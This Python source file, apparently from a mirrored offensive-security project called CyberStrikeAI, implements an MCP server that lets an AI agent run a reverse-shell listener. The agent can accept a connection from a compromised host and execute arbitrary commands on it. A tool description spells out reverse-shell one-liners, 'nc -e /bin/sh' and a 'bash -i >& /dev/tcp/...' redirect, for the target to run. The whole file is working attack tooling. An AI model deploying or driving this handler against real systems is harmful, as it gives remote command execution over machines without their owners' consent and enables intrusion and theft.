mirror of
https://github.com/Ed1s0nZ/CyberStrikeAI.git
synced 2026-03-31 08:19:54 +02:00
329 lines
11 KiB
Python
329 lines
11 KiB
Python
#!/usr/bin/env python3
|
||
"""
|
||
Reverse Shell MCP Server - 反向 Shell MCP 服务
|
||
|
||
通过 MCP 协议暴露反向 Shell 能力:开启/停止监听、与已连接客户端交互执行命令。
|
||
无需修改 CyberStrikeAI 后端,在「设置 → 外部 MCP」中以 stdio 方式添加即可。
|
||
|
||
依赖:pip install mcp(或使用项目 venv)
|
||
运行:python mcp_reverse_shell.py 或 python3 mcp_reverse_shell.py
|
||
"""
|
||
|
||
from __future__ import annotations
|
||
|
||
import asyncio
|
||
import socket
|
||
import threading
|
||
import time
|
||
from typing import Any
|
||
|
||
from mcp.server.fastmcp import FastMCP
|
||
|
||
# ---------------------------------------------------------------------------
|
||
# 反向 Shell 状态(单例:一个监听器、一个已连接客户端)
|
||
# ---------------------------------------------------------------------------
|
||
|
||
_LISTENER: socket.socket | None = None
|
||
_LISTENER_THREAD: threading.Thread | None = None
|
||
_LISTENER_PORT: int | None = None
|
||
_CLIENT_SOCK: socket.socket | None = None
|
||
_CLIENT_ADDR: tuple[str, int] | None = None
|
||
_LOCK = threading.Lock()
|
||
_STOP_EVENT = threading.Event()
|
||
_READY_EVENT = threading.Event()
|
||
_LAST_LISTEN_ERROR: str | None = None
|
||
_LISTENER_THREAD_JOIN_TIMEOUT = 1.0
|
||
_START_READY_TIMEOUT = 1.5
|
||
|
||
# 用于 send_command 的输出结束标记(避免无限等待)
|
||
_END_MARKER = "__RS_DONE__"
|
||
_RECV_TIMEOUT = 30.0
|
||
_RECV_CHUNK = 4096
|
||
|
||
|
||
def _get_local_ips() -> list[str]:
|
||
"""获取本机 IP 列表(供目标机反弹连接用),优先非 127 地址。"""
|
||
ips: list[str] = []
|
||
try:
|
||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||
s.connect(("8.8.8.8", 80))
|
||
ip = s.getsockname()[0]
|
||
s.close()
|
||
if ip and ip != "127.0.0.1":
|
||
ips.append(ip)
|
||
except OSError:
|
||
pass
|
||
if not ips:
|
||
try:
|
||
ip = socket.gethostbyname(socket.gethostname())
|
||
if ip:
|
||
ips.append(ip)
|
||
except OSError:
|
||
pass
|
||
if not ips:
|
||
ips.append("127.0.0.1")
|
||
return ips
|
||
|
||
|
||
def _accept_loop(port: int) -> None:
|
||
"""在后台线程中:bind、listen、accept,只接受一个客户端。"""
|
||
global _LISTENER, _CLIENT_SOCK, _CLIENT_ADDR, _LISTENER_PORT, _LAST_LISTEN_ERROR
|
||
sock: socket.socket | None = None
|
||
try:
|
||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||
sock.bind(("0.0.0.0", port))
|
||
sock.listen(1)
|
||
# 避免 stop_listener 关闭后 accept() 长时间不返回:用超时轮询检查停止事件
|
||
sock.settimeout(0.5)
|
||
with _LOCK:
|
||
_LISTENER = sock
|
||
_LISTENER_PORT = port
|
||
_LAST_LISTEN_ERROR = None
|
||
_READY_EVENT.set()
|
||
# 循环 accept:只接受一个连接,或等待 stop 事件
|
||
while not _STOP_EVENT.is_set():
|
||
try:
|
||
client, addr = sock.accept()
|
||
except socket.timeout:
|
||
continue
|
||
except OSError:
|
||
break
|
||
with _LOCK:
|
||
_CLIENT_SOCK = client
|
||
_CLIENT_ADDR = (addr[0], addr[1])
|
||
break
|
||
except OSError as e:
|
||
with _LOCK:
|
||
_LAST_LISTEN_ERROR = str(e)
|
||
_READY_EVENT.set()
|
||
finally:
|
||
with _LOCK:
|
||
_LISTENER = None
|
||
_LISTENER_PORT = None
|
||
if sock is not None:
|
||
try:
|
||
sock.close()
|
||
except OSError:
|
||
pass
|
||
|
||
|
||
def _start_listener(port: int) -> str:
|
||
global _LISTENER_THREAD, _LISTENER_PORT, _CLIENT_SOCK, _CLIENT_ADDR, _LAST_LISTEN_ERROR
|
||
old_thread: threading.Thread | None = None
|
||
with _LOCK:
|
||
if _LISTENER is not None:
|
||
# _LISTENER_PORT 可能短暂为 None(例如刚 stop/start),因此做个兜底显示
|
||
show_port = _LISTENER_PORT if _LISTENER_PORT is not None else port
|
||
return f"已在监听中(端口: {show_port}),请先 stop_listener 再重新 start。"
|
||
if _CLIENT_SOCK is not None:
|
||
try:
|
||
_CLIENT_SOCK.close()
|
||
except OSError:
|
||
pass
|
||
_CLIENT_SOCK = None
|
||
_CLIENT_ADDR = None
|
||
old_thread = _LISTENER_THREAD
|
||
|
||
# 若旧线程还没完全退出,短暂等待一下以减少端口绑定失败概率
|
||
if old_thread is not None and old_thread.is_alive():
|
||
old_thread.join(timeout=0.5)
|
||
|
||
_STOP_EVENT.clear()
|
||
_READY_EVENT.clear()
|
||
_LAST_LISTEN_ERROR = None
|
||
th = threading.Thread(target=_accept_loop, args=(port,), daemon=True)
|
||
th.start()
|
||
_LISTENER_THREAD = th
|
||
|
||
# 等待后台线程完成 bind/listen(或失败)
|
||
_READY_EVENT.wait(timeout=_START_READY_TIMEOUT)
|
||
with _LOCK:
|
||
err = _LAST_LISTEN_ERROR
|
||
listening = _LISTENER is not None
|
||
|
||
if listening:
|
||
ips = _get_local_ips()
|
||
addrs = ", ".join(f"{ip}:{port}" for ip in ips)
|
||
return (
|
||
f"已在 0.0.0.0:{port} 开始监听。"
|
||
f"目标机请反弹到: {addrs}(任选其一)。连接后使用 reverse_shell_send_command 执行命令。"
|
||
)
|
||
|
||
if err:
|
||
return f"启动监听失败(0.0.0.0:{port}):{err}"
|
||
|
||
# 仍未准备好:可能线程调度较慢或环境异常;给出可操作的提示
|
||
return f"启动监听未确认成功(0.0.0.0:{port})。请调用 reverse_shell_status 确认,或稍后重试。"
|
||
|
||
|
||
def _stop_listener() -> str:
|
||
global _LISTENER, _LISTENER_THREAD, _CLIENT_SOCK, _CLIENT_ADDR, _LISTENER_PORT
|
||
listener_sock: socket.socket | None = None
|
||
client_sock: socket.socket | None = None
|
||
old_thread: threading.Thread | None = None
|
||
with _LOCK:
|
||
_STOP_EVENT.set()
|
||
_READY_EVENT.set()
|
||
listener_sock = _LISTENER
|
||
old_thread = _LISTENER_THREAD
|
||
_LISTENER = None
|
||
_LISTENER_PORT = None
|
||
client_sock = _CLIENT_SOCK
|
||
_CLIENT_SOCK = None
|
||
_CLIENT_ADDR = None
|
||
|
||
if listener_sock is not None:
|
||
try:
|
||
listener_sock.close()
|
||
except OSError:
|
||
pass
|
||
if client_sock is not None:
|
||
try:
|
||
client_sock.close()
|
||
except OSError:
|
||
pass
|
||
|
||
# 等待监听线程退出,避免 stop/start 竞态导致“端口 None 仍提示已在监听中”
|
||
if old_thread is not None and old_thread.is_alive():
|
||
old_thread.join(timeout=_LISTENER_THREAD_JOIN_TIMEOUT)
|
||
with _LOCK:
|
||
_LISTENER_THREAD = None
|
||
return "监听已停止,已断开当前客户端(如有)。"
|
||
|
||
|
||
def _disconnect_client() -> str:
|
||
global _CLIENT_SOCK, _CLIENT_ADDR
|
||
with _LOCK:
|
||
if _CLIENT_SOCK is None:
|
||
return "当前无已连接客户端。"
|
||
try:
|
||
_CLIENT_SOCK.close()
|
||
except OSError:
|
||
pass
|
||
addr = _CLIENT_ADDR
|
||
_CLIENT_SOCK = None
|
||
_CLIENT_ADDR = None
|
||
return f"已断开客户端 {addr}。"
|
||
|
||
|
||
def _status() -> dict[str, Any]:
|
||
with _LOCK:
|
||
listening = _LISTENER is not None
|
||
port = _LISTENER_PORT
|
||
connected = _CLIENT_SOCK is not None
|
||
addr = _CLIENT_ADDR
|
||
connect_back = None
|
||
if listening and port is not None:
|
||
ips = _get_local_ips()
|
||
connect_back = [f"{ip}:{port}" for ip in ips]
|
||
return {
|
||
"listening": listening,
|
||
"port": port,
|
||
"connect_back": connect_back,
|
||
"connected": connected,
|
||
"client_address": f"{addr[0]}:{addr[1]}" if addr else None,
|
||
}
|
||
|
||
|
||
def _send_command_blocking(command: str, timeout: float = _RECV_TIMEOUT) -> str:
|
||
"""在同步上下文中向已连接客户端发送命令并读取输出(带结束标记)。"""
|
||
global _CLIENT_SOCK, _CLIENT_ADDR
|
||
with _LOCK:
|
||
client = _CLIENT_SOCK
|
||
if client is None:
|
||
return "错误:当前无已连接客户端。请先 start_listener,等待目标连接后再 send_command。"
|
||
# 使用结束标记以便可靠地截断输出
|
||
wrapped = f"{command.strip()}\necho {_END_MARKER}\n"
|
||
try:
|
||
client.settimeout(timeout)
|
||
client.sendall(wrapped.encode("utf-8", errors="replace"))
|
||
data = b""
|
||
while True:
|
||
try:
|
||
chunk = client.recv(_RECV_CHUNK)
|
||
if not chunk:
|
||
break
|
||
data += chunk
|
||
if _END_MARKER.encode() in data:
|
||
break
|
||
except socket.timeout:
|
||
break
|
||
text = data.decode("utf-8", errors="replace")
|
||
if _END_MARKER in text:
|
||
text = text.split(_END_MARKER)[0].strip()
|
||
return text or "(无输出)"
|
||
except (ConnectionResetError, BrokenPipeError, OSError) as e:
|
||
with _LOCK:
|
||
if _CLIENT_SOCK is client:
|
||
_CLIENT_SOCK = None
|
||
_CLIENT_ADDR = None
|
||
return f"连接已断开: {e}"
|
||
except Exception as e:
|
||
return f"执行异常: {e}"
|
||
|
||
|
||
# ---------------------------------------------------------------------------
|
||
# MCP 服务与工具
|
||
# ---------------------------------------------------------------------------
|
||
|
||
app = FastMCP(
|
||
name="reverse-shell",
|
||
instructions="反向 Shell MCP:在本地开启 TCP 监听,等待目标机连接后通过工具执行命令。",
|
||
)
|
||
|
||
|
||
@app.tool(
|
||
description="在指定端口启动反向 Shell 监听。目标机需执行反向连接(如 nc -e /bin/sh YOUR_IP PORT 或 bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1)。仅支持一个监听器与一个客户端。",
|
||
)
|
||
def reverse_shell_start_listener(port: int) -> str:
|
||
"""Start reverse shell listener on the given port (e.g. 4444)."""
|
||
if port < 1 or port > 65535:
|
||
return "端口需在 1–65535 之间。"
|
||
return _start_listener(port)
|
||
|
||
|
||
@app.tool(
|
||
description="停止反向 Shell 监听并断开当前客户端。",
|
||
)
|
||
def reverse_shell_stop_listener() -> str:
|
||
"""Stop the listener and disconnect the current client."""
|
||
return _stop_listener()
|
||
|
||
|
||
@app.tool(
|
||
description="查看当前状态:是否在监听、端口、是否有客户端连接及客户端地址。",
|
||
)
|
||
def reverse_shell_status() -> str:
|
||
"""Get listener and client connection status."""
|
||
s = _status()
|
||
lines = [
|
||
f"监听中: {s['listening']}",
|
||
f"端口: {s['port']}",
|
||
f"反弹地址(目标机连接): {', '.join(s['connect_back']) if s.get('connect_back') else '-'}",
|
||
f"已连接: {s['connected']}",
|
||
f"客户端: {s['client_address'] or '-'}",
|
||
]
|
||
return "\n".join(lines)
|
||
|
||
|
||
@app.tool(
|
||
description="向已连接的反向 Shell 客户端发送一条命令并返回输出。若无连接请先 start_listener 并等待目标连接。",
|
||
)
|
||
async def reverse_shell_send_command(command: str) -> str:
|
||
"""Send a command to the connected reverse shell client and return output."""
|
||
# 在线程池中执行阻塞的 socket I/O,避免长时间占用 MCP 主线程,使 status/stop_listener 等仍可响应
|
||
return await asyncio.to_thread(_send_command_blocking, command)
|
||
|
||
|
||
@app.tool(
|
||
description="仅断开当前客户端连接,不停止监听(可继续等待新连接)。",
|
||
)
|
||
def reverse_shell_disconnect() -> str:
|
||
"""Disconnect the current client without stopping the listener."""
|
||
return _disconnect_client()
|
||
|
||
|
||
if __name__ == "__main__":
|
||
app.run(transport="stdio")
|